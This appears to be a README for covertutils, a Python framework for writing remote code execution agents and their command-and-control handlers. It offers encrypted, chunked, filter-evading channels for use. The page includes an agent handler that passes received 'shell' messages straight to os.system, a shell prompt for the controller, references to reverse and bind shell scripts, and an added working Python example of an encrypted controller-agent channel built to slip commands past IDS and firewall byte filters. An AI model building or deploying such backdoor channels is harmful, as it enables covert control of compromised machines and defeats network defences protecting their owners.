A framework for Remote Code Execution Agent programming.
Blog Post in Securosophy describing some internals
This Python package automatically handles all communication channel options, like encryption, chunking, steganography, etc.
With all of those set up in a few lines of code, a programmer can spend their time creating the actual payloads, persistence mechanisms, shellcodes and generally more creative stuff!
Security programmers can stop re-inventing the wheel (implementing encryption on both the agent side and the handler side) and spend their time developing more versatile agents and more feature-rich shells!
Yes, Python, and more specifically Python 2.7 only, for the time being...
NO! Absolutely no dependencies, only pure Python built-ins! The entropy package is required for the tests, though.
This is a requirement of the package itself, to keep things smooth when compiling agents into standalone executable binaries.
Messages are all things that mean something to the listener. Messages travel through communication channels, and they have to be unaware of the channel they are travelling in. In other words, messages have to be independent of the means of their transportation.
- If the communication channel can only carry short byte chunks per "burst", the message has to be chunked.
- If the communication channel filters certain byte sequences (IDS/IPS, next-generation firewalls), the message has to be transformed (encrypted, encoded or steganographically hidden) so that the filtered sequences never appear on the wire.
The Stream is a tag that gives a certain context to the message. It can be defined and used for arbitrary reasons. Streams, for example, can be used to separate shell command messages from shellcode messages.
Orchestrators are the core of data manipulation in covertutils. They handle all data transformation methods to translate raw chunks of data into Stream-Message pairs.
Handlers tie together the raw byte input/output with the Orchestrators to provide an interface of:
- onChunk()
- onMessage()
- onNotRecognized()
For example, an agent that runs anything it receives on the 'shell' stream as a local shell command:

```python
import os

def onMessage(message, stream):
    # Messages tagged with the 'shell' stream are command lines: run them as-is.
    if stream == 'shell':
        os.system(message)
```
A shell interface with prompt and stream control can be spawned from a Handler instance with:

```python
shell = PrintShell(handler)
shell.start()
```
In the prompt, !main switches the active stream from control to main, and Ctrl-C asks for confirmation before exiting:

```text
(covertutils v0.2.1)[control]>
(covertutils v0.2.1)[control]> !main
(covertutils v0.2.1)[main]>
<Ctrl-C>
Really Control-C [y/N]? y
Aborted by the user...
```
Networking is not handled by covertutils, as Python provides a great built-in networking API (directly inherited from C). The only requirement of a covertutils Handler is two functions wrapping the raw data sending and receiving.
Just pass a send(raw) and a recv() function to a Handler and you have a working "One-Time-Pad" encrypted, bandwidth-aware, protocol-independent, password-protected channel. One caveat: since the pad is derived from the shared password rather than being a pre-shared random pad as long as the traffic, this is a password-keyed stream cipher in practice, not an information-theoretic one-time pad, so the channel is only as strong as the password.
Sample TCP/UDP reverse shell and TCP bind shell scripts can be found in the examples/ directory.
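As an added illustration of how Messages, Streams, Orchestrators and Handlers fit together, and of what "just pass a send(raw) and a recv()" means in practice, the following Python 3 script is example code written for this page, not covertutils' own: the Orchestrator and Handler classes, the chunk layout, the truncated-HMAC check and the SHA-256 counter-mode keystream are all assumptions of the example. It chunks, encrypts and reassembles a Stream-Message pair, and builds two Handlers from nothing more than a send and a recv callable over a socketpair:

```python
# Added example (not covertutils code): names, chunk layout and cipher are assumptions here.
import hashlib, hmac, os, socket, struct

PASSWORD = b"s3cr3t-passphrase"          # constructed shared secret (both sides)
STREAMS = ["control", "main", "shell"]   # stream name -> 1-byte tag (its index)
CHUNK = 32                               # raw bytes the channel delivers per "burst"
HDR = struct.Struct(">BBH")              # tag, last-chunk flag, payload length
MAC_LEN = 4                              # truncated HMAC over header + payload
PAYLOAD = CHUNK - HDR.size - MAC_LEN     # 24 message bytes per chunk

def keystream(password, counter, length):
    # SHA-256 in counter mode over the password: a password-derived "OTP" is a stream cipher.
    out, i = b"", 0
    while len(out) < length:
        out += hashlib.sha256(password + struct.pack(">II", counter, i)).digest()
        i += 1
    return out[:length]

def xor(a, b): return bytes(x ^ y for x, y in zip(a, b))

class Orchestrator(object):
    """(stream, message) <-> encrypted chunks: tag(1) last(1) len(2) mac(4) payload fill."""
    def __init__(self, password, streams):
        self.password, self.streams = password, list(streams)
        self.tx = self.rx = 0            # per-direction chunk counters (in-order delivery assumed)
        self.partial = {}                # tag -> payload bytes collected so far

    def _mac(self, hdr, piece):
        return hmac.new(self.password, hdr + piece, hashlib.sha256).digest()[:MAC_LEN]

    def pack(self, stream, message):
        tag, chunks = self.streams.index(stream), []
        pieces = [message[i:i + PAYLOAD] for i in range(0, len(message), PAYLOAD)] or [b""]
        for n, piece in enumerate(pieces):
            hdr = HDR.pack(tag, int(n == len(pieces) - 1), len(piece))
            plain = hdr + self._mac(hdr, piece) + piece
            plain += os.urandom(CHUNK - len(plain))           # random fill, not a constant
            chunks.append(xor(plain, keystream(self.password, self.tx, CHUNK)))
            self.tx += 1
        return chunks

    def unpack(self, chunk):
        # (stream, message) once complete; None while pending; ValueError if not ours.
        plain = xor(chunk, keystream(self.password, self.rx, CHUNK))
        self.rx += 1
        hdr, mac = plain[:HDR.size], plain[HDR.size:HDR.size + MAC_LEN]
        tag, last, n = HDR.unpack(hdr)
        piece = plain[HDR.size + MAC_LEN:HDR.size + MAC_LEN + n]
        if tag >= len(self.streams) or n > PAYLOAD or not hmac.compare_digest(mac, self._mac(hdr, piece)):
            raise ValueError("chunk not recognized")     # wrong password or foreign traffic
        self.partial[tag] = self.partial.get(tag, b"") + piece
        return (self.streams[tag], self.partial.pop(tag)) if last else None

class Handler(object):
    """Binds raw send(raw)/recv() callables to an Orchestrator; transport-agnostic."""
    def __init__(self, orch, send, recv, on_message, on_not_recognized=lambda raw: None):
        self.orch, self.send, self.recv = orch, send, recv
        self.on_message, self.on_not_recognized = on_message, on_not_recognized

    def send_message(self, stream, message):
        for chunk in self.orch.pack(stream, message):
            self.send(chunk)

    def handle_one(self):
        # Pull chunks until a whole message arrives, then dispatch it as onMessage(message, stream).
        while True:
            raw = self.recv()
            try:
                done = self.orch.unpack(raw)
            except ValueError:
                self.on_not_recognized(raw)
                return None
            if done is not None:
                self.on_message(done[1], done[0])
                return done

def demo(command=b"whoami"):
    # Controller and agent over a socketpair(): command out on 'shell', output back on 'shell'.
    c2_sock, agent_sock = socket.socketpair()
    wire, got = [], []
    def make_io(sock):                   # the two callables a Handler needs
        def send(raw):
            wire.append(raw)             # keep a copy to show what the channel saw
            sock.sendall(raw)
        return send, lambda: sock.recv(CHUNK, socket.MSG_WAITALL)   # one chunk per call
    def agent_on_message(message, stream):
        # The page's agent runs os.system(message) here; a constructed lookup keeps this offline.
        if stream == "shell":
            output = {b"whoami": b"uid=1000(agent)\n"}.get(message, b"sh: not found\n")
            agent.send_message("shell", output)
    agent = Handler(Orchestrator(PASSWORD, STREAMS), *make_io(agent_sock), agent_on_message)
    c2 = Handler(Orchestrator(PASSWORD, STREAMS), *make_io(c2_sock), lambda m, s: got.append((s, m)))
    c2.send_message("shell", command)
    agent.handle_one()                   # agent "executes" and replies
    c2.handle_one()                      # controller receives the output
    c2_sock.close(); agent_sock.close()
    return got[0], wire
```

demo() returns the reply as the controller saw it together with the raw chunks that crossed the wire; neither the command nor its output is visible in those bytes, which is the property that gets a message past a filter that matches byte sequences. Two design points carry over to a real agent: the keystream is a function of the password, which is why a password-protected "one-time pad" channel is a stream cipher in practice, and the per-direction counters mean chunks must arrive in order, which TCP guarantees and UDP does not.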
Certainly! All pull requests that are tested and do not break the existing tests will be accepted! Especially Pull Requests towards Python2/Python3 compatibility will be greatly appreciated!